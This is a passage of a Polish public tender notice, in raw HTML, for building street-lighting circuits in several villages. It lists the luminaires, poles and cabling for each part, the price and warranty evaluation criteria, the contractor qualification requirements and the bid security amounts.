zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kostrzyca – ul. Jeleniogórska i Kościuszki - etap VII:<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka obwodu nr 2 sieci energetycznej niskiego<br/>napięcia oświetlenia ulicznego od istniejącej słupa oświetleniowego nr L23/2 do słupa nr L26/2 włącznie, zgodnie z<br/>dokumentacją projektową w miejscowości Kostrzyca przy ulicy Kościuszki (dz. nr 44/8, 44/6, 103/2 dr obręb 0006<br/>Kostrzyca), w tym:<br/> dostawa i montaż opraw oświetleniowych LED o mocy min. 67W (temperatura barwowa światła 5000 K, strumień świetlny<br/>min. 8400 lm), w ilości 3 szt.,<br/> dostawa i montaż 3 szt. słupów oświetleniowych o wysokości 7,0 m. z wysięgnikami o długości 0,5 m i prefabrykowanymi<br/>fundamentami. Słupy i wysięgniki stalowe ocynkowane okrągłe zgodne z typoszeregiem zastosowanym na ostatnio<br/>wykonanych odcinkach tego samego obwodu wyposażone w tabliczki bezpiecznikowe,<br/> zasilanie kablem typu YAKXS 4x25 mm2, zabezpieczonym na całej długości w rurą osłonową o średnicy 75 mm<br/>przystosowaną do układania pod drogami,<br/> uziemienie wykonane za pomocą ułożonej w wykopie bednarki stalowej ocynkowanej 25x4 mm na całej długości odcinka,<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Strużnica – etap III<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka obwodu sieci energetycznej niskiego napięcia<br/>oświetlenia ulicznego w pobliżu budynku o nr 15 na działkach o numerze ewidencyjnym 76/14, 78/2, 80/5, 105 dr, obręb<br/>0010 Strużnica, od istniejącego słupa o nr 8 tj. słup nr 9, nr 10, nr 11, nr 12 zgodnie z dokumentacją projektową w<br/>miejscowości Strużnica przy drodze powiatowej nr 2735D, w tym:<br/> dostawa i montaż oprawy oświetleniowej LED o mocy 55W (temperatura barwowa światła 5000 K) w ilości 4 szt.<br/> dostawa i montaż 3 szt. słupów oświetleniowych ŻN 10/200 z wysięgnikiem rurowym WE 3/2 o długości 1,0 m i ustojem,<br/> dostawa i montaż 1 szt. słupa oświetleniowego wirowanego E10,5/4,3 z wysięgnikiem rurowym WE 2/1 o długości 1,0 m i<br/>ustojem,<br/> zasilanie oprawy za pomocą izolowanego przewodu AsXSn 2x25mm2,<br/> uziemienie wykonane za pomocą bednarki stalowej i uziomów prętowych,<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dąbrowica - obwód nr 2 – etap VII:<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka obwodu nr 2 sieci energetycznej niskiego<br/>napięcia oświetlenia ulicznego od istniejącego słupa nr L2/15 do słupa L2/17 włącznie, zgodnie z dokumentacją projektową<br/>w miejscowości Dąbrowica dz. nr 105 obręb 0003 Dąbrowica w tym:<br/> dostawa i montaż opraw oświetleniowych sodowych wysokoprężnych o mocy 70W w ilości 3 szt. zgodnych z typoszeregiem<br/>zastosowanym na dotychczas wykonanych odcinkach tego samego obwodu,<br/> dostawa i montaż 2 szt. słupów stalowych ośmiokątnych o wysokości 7 m. z wysięgnikami o długości około 1,0 m i<br/>prefabrykowanymi fundamentami. Słupy i wysięgniki zgodne z typoszeregiem zastosowanym na dotychczas wykonanych<br/>odcinkach tego samego obwodu wyposażone w tabliczki bezpiecznikowe typu TB-1,<br/> zasilanie kablem typu YAKY 4x25 mm2, zabezpieczonym na całej długości w rurą osłonową o średnicy 75 mm<br/>przystosowaną do układania pod drogami,<br/> uziemienie wykonane za pomocą ułożonej w wykopie bednarki stalowej ocynkowanej 25x4 mm na całej długości odcinka,<br/> w miejscach zbliżeń i skrzyżowań z istniejącym elementami sieci uzbrojenia podziemnego wymaga się wykonania<br/>zabezpieczeń z rur dwudzielnych,<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Łomnica - etap VI – ul. Karkonoska i ul. Górna<br/>Przedmiotem zamówienia są roboty budowlane związane z budową odcinka sieci energetycznej niskiego napięcia<br/>oświetlenia ulicznego tj. słup nr 2/17/L2, 2/18/L3, 2/19/L1 2/7/L1, 2/8/L2, 2/28/L1 zgodnie z dokumentacją projektową w<br/>miejscowości Łomnica przy ulicy Karkonoskiej dz. nr 443/2, 445/2, 441/4, 901 obr. 0008 Łomnica, w tym:<br/> dostawa i montaż opraw oświetleniowych LED o mocy 55W (temperatura barwowa światła 5000 K, strumień świetlny<br/>oprawy 5000 lm), w ilości 6 szt.,<br/> dostawa i montaż 6 szt. słupów oświetleniowych w kolorze inox o wysokości 6,0 m. z wysięgnikami o długości ok. 1 m i<br/>prefabrykowanymi fundamentami. Słupy i wysięgniki aluminiowe anodowane, słupy zabezpieczone elastomerem w dolnej<br/>części na wysokość do 0,5 metra nad ziemią,<br/> zasilanie kablem typu YAKXS 5x25 mm2 układanym na całej długości w rurze osłonowej o średnicy 50mm, wykonanej z<br/>HDPE, przystosowanej do układania pod drogami,<br/> uziemienie wykonane za pomocą ułożonej w wykopie bednarki stalowej ocynkowanej 30x4 mm o długości min. 30 m,<br/> w miejscach zbliżeń i skrzyżowań z istniejącym elementami sieci uzbrojenia podziemnego wymaga się wykonania<br/>zabezpieczeń z rur dwudzielnych.<br/> oznakowanie słupów oświetleniowych,<br/> odtworzenie nawierzchni jezdni, poboczy i zieleńców,<br/> wykonanie niezbędnych pomiarów i prób oraz dokumentacji geodezyjnej.<br/>Szczegółowe informacje znajdują się w dokumentacji projektowej w załączeniu.<br/>Ilość robót należy określić na podstawie dokumentacji projektowej oraz wizji w terenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zakres<br/>powyższych zamówień będzie polegał na powtórzeniu podobnych dostaw,<br/>usług lub robót budowlanych , jak w zamówieniu podstawowym do 15% wartości zamówienia<br/>podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert Zamawiający będzie się kierował następującymi<br/>kryteriami i wagami: kryterium obowiązujące: cena waga: 60% kryterium przedmiotowe: okres<br/>gwarancji i rękojmi waga: 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu:<br/>O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania;<br/>2) spełniają warunki udziału w postępowaniu dla części I - VIII dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną:<br/>Część I - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część II - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część III - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część IV - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część V - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VI - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VII - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VIII - 200 000,00 zł (dwieście tysięcy złotych).<br/>a) zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował:<br/>a. co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót budowlanych przy realizacji przedmiotowego<br/>zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia (lub<br/>odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów) – mającą doświadczenie w<br/>kierowaniu co najmniej jedną budową lub robotą budowlaną polegającą budowie sieci oświetlenia ulicznego o wartości min.<br/>30 000,00 zł. (tj. usługi zrealizowanej w oparciu o jedną odrębną umowę, nie dopuszcza się sumowania wartości kilku<br/>zamówień w celu uzyskania wartości wymaganej przez Zamawiającego),<br/>b. minimum czterema pracownikami fizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacją<br/>zamówienia przez cały okres jego trwania, zatrudnionych na umowę o pracę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia Wykonawcy z udziałuw postępowaniu:a) odpis<br/>zwłaściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli<br/>odrębneprzepisy wymagają wpisu do rejestru lub ewidencji, w zakresie art. 109ust. 1 pkt.4<br/>ustawy.JeżeliWykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej<br/>Polskiej, zamiastww. odpisu, składa dokument lub dokumenty wystawione w kraju, wktórym<br/>Wykonawca ma siedzibęlub miejsce zamieszkania, potwierdzające, że nie otwarto jegolikwidacji ani nie<br/>ogłoszono upadłości.Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejscezamieszkania lub<br/>miejsce zamieszkaniama osoba, której dokument dotyczy, nie wydaje siędokumentów, o których mowa<br/>powyżej, zastępujesię je dokumentem zawierającym odpowiedniooświadczenie Wykonawcy, ze<br/>wskazaniem osoby alboosób uprawnionych do jego reprezentacji, luboświadczenie osoby, której<br/>dokument miał dotyczyć,złożone przed notariuszem lub przed organemsądowym, administracyjnym<br/>albo organem samorząduzawodowego lub gospodarczego właściwym zewzględu na siedzibę lub<br/>miejsce zamieszkaniaWykonawcy lub miejsce zamieszkania tej osoby.Dokumenty/oświadczenia<br/>powinny być wystawionenie wcześniej niż 6 miesięcy przed upływem terminuskładania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>wpostępowaniu:a) sytuacjiekonomicznej lub finansowej:dokument potwierdzający, że Wykonawca<br/>jestubezpieczony ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>zprzedmiotem zamówieniana sumę gwarancyjną określoną w dziale XII pkt. 1 ppkt. 2 lit. c. Zgodnie<br/>zart. 26 ust. 2c ustawy Pzp,jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentu,<br/>októrym mowa powyżej,może złożyć inny dokument, który w wystarczający sposób potwierdzi<br/>spełnianie warunku udziału wpostępowaniu;b) zdolności technicznej lub zawodowej:wykaz osób,<br/>którebędą uczestniczyć wwykonywaniu zamówienia, odpowiedzialnych za kierowanie<br/>robotamibudowlanymi (dziale XII pkt. 1ppkt. 2 lit. d), wraz z informacjami na temat ich kwalifikacji<br/>zawodowych,doświadczenia i wykształcenianiezbędnych do wykonania zamówienia, a także<br/>zakresuwykonywanych przez nich czynności, orazinformacją o podstawie do dysponowania tymi<br/>osobami;(Załącznik nr 3 do SWZ);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania;<br/>2) spełniają warunki udziału w postępowaniu dla części I - VIII dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną:<br/>Część I - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część II - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część III - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część IV - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część V - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VI - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VII - 200 000,00 zł (dwieście tysięcy złotych),<br/><br/>a) zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował:<br/>a. co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót budowlanych przy realizacji przedmiotowego<br/>zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia (lub<br/>odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów) – mającą doświadczenie w<br/>kierowaniu co najmniej jedną budową lub robotą budowlaną polegającą budowie sieci oświetlenia ulicznego o wartości min. 30 000,00 zł. (tj. usługi zrealizowanej w oparciu o jedną odrębną umowę, nie dopuszcza się sumowania wartości kilku<br/>zamówień w celu uzyskania wartości wymaganej przez Zamawiającego),<br/>b. minimum czterema pracownikami fizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacją<br/>zamówienia przez cały okres jego trwania, zatrudnionych na umowę o pracę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania;<br/>2) spełniają warunki udziału w postępowaniu dla części I - VIII dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną:<br/>Część I - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część II - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część III - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część IV - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część V - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VI - 200 000,00 zł (dwieście tysięcy złotych),<br/>Część VII - 200 000,00 zł (dwieście tysięcy złotych),<br/><br/>a) zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że dysponuje lub będzie dysponował:<br/>a. co najmniej jedną osobą, która będzie pełnić funkcję kierownika robót budowlanych przy realizacji przedmiotowego<br/>zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia (lub<br/>odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów) – mającą doświadczenie w<br/>kierowaniu co najmniej jedną budową lub robotą budowlaną polegającą budowie sieci oświetlenia ulicznego o wartości min. 30 000,00 zł. (tj. usługi zrealizowanej w oparciu o jedną odrębną umowę, nie dopuszcza się sumowania wartości kilku<br/>zamówień w celu uzyskania wartości wymaganej przez Zamawiającego),<br/>b. minimum czterema pracownikami fizycznymi, którzy będą wykonywać czynności bezpośrednio związane z realizacją<br/>zamówienia przez cały okres jego trwania, zatrudnionych na umowę o pracę. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Warunkiem udziału w postępowaniu jest wniesienie wadium:<br/>Dla części I - 200,00 zł (słownie: dwieście złotych 00/100),<br/>Dla części II - 600,00 zł (słownie: sześćset złotych 00/100),<br/>Dla części III - 300,00 zł (słownie: trzysta złotych 00/100),<br/>Dla części IV - 400,00 zł (słownie: czterysta złotych 00/100),<br/>Dla części V - 200,00 zł (słownie: dwieście złotych 00/100),<br/>Dla części VI - 200,00 zł 